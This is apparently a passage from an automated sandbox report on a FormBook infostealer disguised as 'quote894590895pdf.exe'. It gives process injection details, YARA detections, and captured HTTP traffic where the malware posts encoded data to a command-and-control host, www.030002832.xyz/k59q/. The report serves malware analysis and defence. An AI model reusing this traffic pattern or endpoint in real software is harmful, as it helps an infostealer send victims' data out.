                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                                  Oct 11, 2024 16:48:16.620878935 CEST1236INHTTP/1.1 404 Not Found
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 11 Oct 2024 14:48:16 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  X-Trace: 2BD080900B47ADA9B697A8CA495E13725ADA1691D6AFB2C4FE121341F700
                                                                  Set-Cookie: _csrf=0f243aabf7e768b8f26c18949aab256bb020f9ab13b5d85a332d177a2fb17419a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%225P40QjBFaA0YHvzpEe_UYU5zZxYU8W00%22%3B%7D; path=/; HttpOnly
                                                                  Data Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 55 6d 79 49 76 67 73 56 48 6f 6b 2d 45 4b 4c 37 6d 32 34 4b 78 41 7a 51 36 6d 33 30 6c 50 46 58 69 47 51 39 69 4e 4e 54 70 53 74 6e 50 4c 79 4f 57 6e 39 63 7a 31 39 52 6b 71 4c 54 47 48 43 30 53 62 57 31 4f 4b 33 42 78 43 33 53 48 47 54 64 36 77 53 56 47 77 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f [TRUNCATED]
                                                                  Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" content="_csrf"> <meta name="csrf-token" content="UmyIvgsVHok-EKL7m24KxAzQ6m30lPFXiGQ9iNNTpStnPLyOWn9cz19RkqLTGHC0SbW1OK3BxC3SHGTd6wSVGw=="> <title>Not Found (#404)</title> <link href="/css/site.css" rel="stylesheet"></head><body><div class="wrap"> <div class="site-error"> <h1>Not Found (#404)</h1> <div class="alert alert-danger"> Page not found. </div> <p> The above error occurred while the Web server was processing your request. </p> <p> Please contact us if you think this is a server error. Thank you. </p></div></di
                                                                  Oct 11, 2024 16:48:16.621902943 CEST27INData Raw: 76 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: v></body></html>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  25192.168.2.45002765.21.196.90803632C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 11, 2024 16:48:21.734302044 CEST734OUTPOST /k59q/ HTTP/1.1
                                                                  Host: www.030002832.xyz
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.030002832.xyz
                                                                  Referer: http://www.030002832.xyz/k59q/
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 203
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                                  Data Raw: 56 74 38 70 4e 54 3d 6b 61 30 4e 66 7a 45 32 71 49 31 58 33 49 4e 2f 30 69 68 53 39 43 50 31 78 39 6d 58 72 78 6a 70 56 48 70 6c 56 77 54 56 70 47 70 45 52 4b 6c 4e 47 4e 6c 62 4b 55 36 54 68 66 2b 64 6f 61 51 37 65 53 63 74 55 35 5a 53 43 38 70 58 57 46 71 67 57 2b 33 47 2f 37 75 49 47 38 47 4e 50 35 49 7a 78 6c 33 6b 6b 34 43 42 68 6a 52 74 32 49 38 68 53 35 72 78 44 58 4a 52 55 56 2f 39 33 32 38 55 38 67 41 42 31 4a 6e 6f 7a 36 74 4f 32 64 6c 41 2b 4a 7a 44 48 37 7a 2b 6c 2b 74 58 38 46 79 36 35 5a 54 66 33 59 57 73 45 73 45 52 31 76 4e 6d 63 4f 7a 37 47 71 50 4f 6e 38 79 7a 67 66 53 6a 63 67 3d 3d
                                                                  Data Ascii: Vt8pNT=ka0NfzE2qI1X3IN/0ihS9CP1x9mXrxjpVHplVwTVpGpERKlNGNlbKU6Thf+doaQ7eSctU5ZSC8pXWFqgW+3G/7uIG8GNP5Izxl3kk4CBhjRt2I8hS5rxDXJRUV/9328U8gAB1Jnoz6tO2dlA+JzDH7z+l+tX8Fy65ZTf3YWsEsER1vNmcOz7GqPOn8yzgfSjcg==
                                                                  Oct 11, 2024 16:48:22.409790993 CEST1032INHTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 796
                                                                  date: Fri, 11 Oct 2024 14:48:22 GMT
                                                                  vary: User-Agent
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  26192.168.2.45002865.21.196.90803632C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 11, 2024 16:48:24.274715900 CEST754OUTPOST /k59q/ HTTP/1.1
                                                                  Host: www.030002832.xyz
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.030002832.xyz
                                                                  Referer: http://www.030002832.xyz/k59q/
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 223
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                                  Data Raw: 56 74 38 70 4e 54 3d 6b 61 30 4e 66 7a 45 32 71 49 31 58 31 73 4a 2f 7a 43 64 53 73 53 50 30 2b 64 6d 58 69 52 6a 74 56 48 31 6c 56 77 37 46 6f 31 4e 45 52 72 56 4e 48 4d 6c 62 48 30 36 54 71 2f 2b 59 6d 36 51 4b 65 53 5a 59 55 34 6c 53 43 38 56 58 57 45 36 67 57 70 4c 46 38 4c 75 4f 4b 63 47 44 42 5a 49 7a 78 6c 33 6b 6b 34 57 6e 68 67 68 74 32 59 4d 68 51 62 44 79 64 48 4a 53 63 31 2f 39 38 57 38 59 38 67 42 6d 31 4d 44 43 7a 38 70 4f 32 64 31 41 2b 63 50 43 4f 37 7a 38 76 65 73 6f 31 51 57 33 35 4c 69 46 38 4a 43 34 4c 6f 45 76 35 4a 63 38 4e 2f 53 73 55 71 72 39 36 37 37 48 74 63 76 71 48 6c 72 78 56 47 70 56 38 56 48 69 47 61 4e 41 6e 34 59 70 61 61 45 3d
                                                                  Data Ascii: Vt8pNT=ka0NfzE2qI1X1sJ/zCdSsSP0+dmXiRjtVH1lVw7Fo1NERrVNHMlbH06Tq/+Ym6QKeSZYU4lSC8VXWE6gWpLF8LuOKcGDBZIzxl3kk4Wnhght2YMhQbDydHJSc1/98W8Y8gBm1MDCz8pO2d1A+cPCO7z8veso1QW35LiF8JC4LoEv5Jc8N/SsUqr9677HtcvqHlrxVGpV8VHiGaNAn4YpaaE=
                                                                  Oct 11, 2024 16:48:24.942148924 CEST1032INHTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 796
                                                                  date: Fri, 11 Oct 2024 14:48:24 GMT
                                                                  vary: User-Agent
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  27192.168.2.45002965.21.196.90803632C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 11, 2024 16:48:26.823822975 CEST10836OUTPOST /k59q/ HTTP/1.1
                                                                  Host: www.030002832.xyz
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.030002832.xyz
                                                                  Referer: http://www.030002832.xyz/k59q/
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 10303
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                                  Data Raw: 56 74 38 70 4e 54 3d 6b 61 30 4e 66 7a 45 32 71 49 31 58 31 73 4a 2f 7a 43 64 53 73 53 50 30 2b 64 6d 58 69 52 6a 74 56 48 31 6c 56 77 37 46 6f 31 46 45 52 5a 78 4e 47 76 64 62 47 30 36 54 6e 66 2b 5a 6d 36 51 74 65 54 39 55 55 34 70 6b 43 36 5a 58 55 6a 36 67 48 6f 4c 46 72 62 75 4f 43 38 47 4f 50 35 49 63 78 6a 58 67 6b 34 47 6e 68 67 68 74 32 62 55 68 55 4a 72 79 66 48 4a 52 55 56 2f 78 33 32 39 46 38 67 34 5a 31 4d 47 33 7a 4d 4a 4f 78 38 46 41 34 75 6e 43 42 37 7a 69 73 65 73 77 31 51 54 33 35 4c 75 42 38 4a 32 53 4c 76 30 76 36 2f 64 31 66 65 75 6d 42 70 36 69 76 37 66 38 76 4f 6e 4f 4f 6c 4f 4a 57 6e 74 4a 2f 32 6a 5a 44 5a 63 7a 69 4a 42 75 48 66 41 74 69 44 74 39 2b 77 72 5a 65 4a 53 41 38 62 69 64 30 53 5a 74 45 55 77 30 52 62 43 64 66 4f 37 65 42 43 2f 36 56 64 48 41 72 55 64 79 4e 74 38 78 79 6c 65 49 42 76 63 51 71 39 51 4d 6c 62 4f 72 31 41 68 4e 52 5a 36 55 62 7a 53 36 65 36 35 39 49 5a 7a 68 73 4c 46 79 38 30 4d 36 6b 30 76 6a 57 69 64 65 79 34 51 42 37 66 55 73 64 39 6d 57 61 56 72 [TRUNCATED]
                                                                  Data Ascii: Vt8pNT=ka0NfzE2qI1X1sJ/zCdSsSP0+dmXiRjtVH1lVw7Fo1FERZxNGvdbG06Tnf+Zm6QteT9UU4pkC6ZXUj6gHoLFrbuOC8GOP5IcxjXgk4Gnhght2bUhUJryfHJRUV/x329F8g4Z1MG3zMJOx8FA4unCB7zisesw1QT35LuB8J2SLv0v6/d1feumBp6iv7f8vOnOOlOJWntJ/2jZDZcziJBuHfAtiDt9+wrZeJSA8bid0SZtEUw0RbCdfO7eBC/6VdHArUdyNt8xyleIBvcQq9QMlbOr1AhNRZ6UbzS6e659IZzhsLFy80M6k0vjWidey4QB7fUsd9mWaVrfOYe24RIKkC3L/Yui9WjW3xT6yqwq8tnNgLsWmpseU95Najc3qEfc6BUdVGedD4kMnopYQtRODkODqkT6ySawZpiR95xzjtlBi70eiGVsMrzvy+OK3XWhzgzxolPgIWISsD/CHtftOpkCdRM6t9FULe6xkpgI+k3CRo1P/0gO7yUU3FK7bTkThtoacBgN1+AFQadFspiYn+fJvhJVKVPKiideqEuY5hMbfz882BBQlTvUmxEU3yadbx2eEc6YAUwSkSvijaQ+0Y8LzF5wXSTVe6mCcXSm4UdbXpsscj+3e5URe9Izo84VEcaPCOkeHD2qAPSin8Uap7gYqWoiRD+sGMJ8MU+k6ZZUz7XMOAztJKfmt7XqdKXgv+9vSVBiM2+U+kowoF+VWiuXSVLt4C/AZmCHmbwiHI/JJvx2LeJcBoaR1yTgWyqSUHmx7/T3cCy8ROPzT9cJANLLPJw1pmrSpKud6BVmCQNQDE4DzIoH0hyiX7w0OikrQ4K7ZdN/zHezav14YgJpzNpit5UrSfxtZiGBYlW92m4hvZDwnFsPODmBMlUtJpbEKsxT8nulBXBAArHoBh7K5gl5ePqfSIdNHeB0ixT3LYcW2QcQCq/2CZOeFhonHNo3Tmds1MztHgTqWtFMZ88lzFP5hgRCw+KhhN6PQI7x5soKT [TRUNCATED]
                                                                  Oct 11, 2024 16:48:27.482517958 CEST1032INHTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 796
                                                                  date: Fri, 11 Oct 2024 14:48:27 GMT
                                                                  vary: User-Agent
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  28192.168.2.45003065.21.196.90803632C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 11, 2024 16:48:29.361876965 CEST464OUTGET /k59q/?Vt8pNT=pYctcHUd+6Fx/IsQ6ix4omD59tSF7jXbTnpFZTzQh111IIx+Ebp2Fnu84te/oL49aHMAArF6WbZdbX7DMbbg+4GhF928ELxk6g386YHHrAtOiLYQc82sN3s=&e4x=ktCxONu0 HTTP/1.1
                                                                  Host: www.030002832.xyz
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                                  Oct 11, 2024 16:48:30.033767939 CEST1032INHTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 796
                                                                  date: Fri, 11 Oct 2024 14:48:29 GMT
                                                                  vary: User-Agent
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:10:45:23
                                                                  Start date:11/10/2024
                                                                  Path:C:\Users\user\Desktop\quote894590895pdf.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\quote894590895pdf.exe"
                                                                  Imagebase:0xe60000
                                                                  File size:1'184'768 bytes
                                                                  MD5 hash:967822AF836343E721975A8FD39FDE4F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:1
                                                                  Start time:10:45:24
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\quote894590895pdf.exe"
                                                                  Imagebase:0x890000
                                                                  File size:46'504 bytes
                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2123235941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2123235941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2123644785.00000000037F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2123644785.00000000037F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2124174158.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2124174158.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:5
                                                                  Start time:10:45:56
                                                                  Start date:11/10/2024
                                                                  Path:C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe"
                                                                  Imagebase:0x550000
                                                                  File size:140'800 bytes
                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3585641662.0000000003050000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3585641662.0000000003050000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:6
                                                                  Start time:10:45:58
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\isoburn.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\SysWOW64\isoburn.exe"
                                                                  Imagebase:0x380000
                                                                  File size:107'008 bytes
                                                                  MD5 hash:BF19DD525C7D23CAFC086E9CCB9C06C6
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3585567216.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3585567216.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3585604704.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3585604704.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3584633901.00000000030D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3584633901.00000000030D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                  Reputation:moderate
                                                                  Has exited:false

                                                                  Target ID:7
                                                                  Start time:10:46:11
                                                                  Start date:11/10/2024
                                                                  Path:C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe
                                                                  Wow64 process (32bit):true
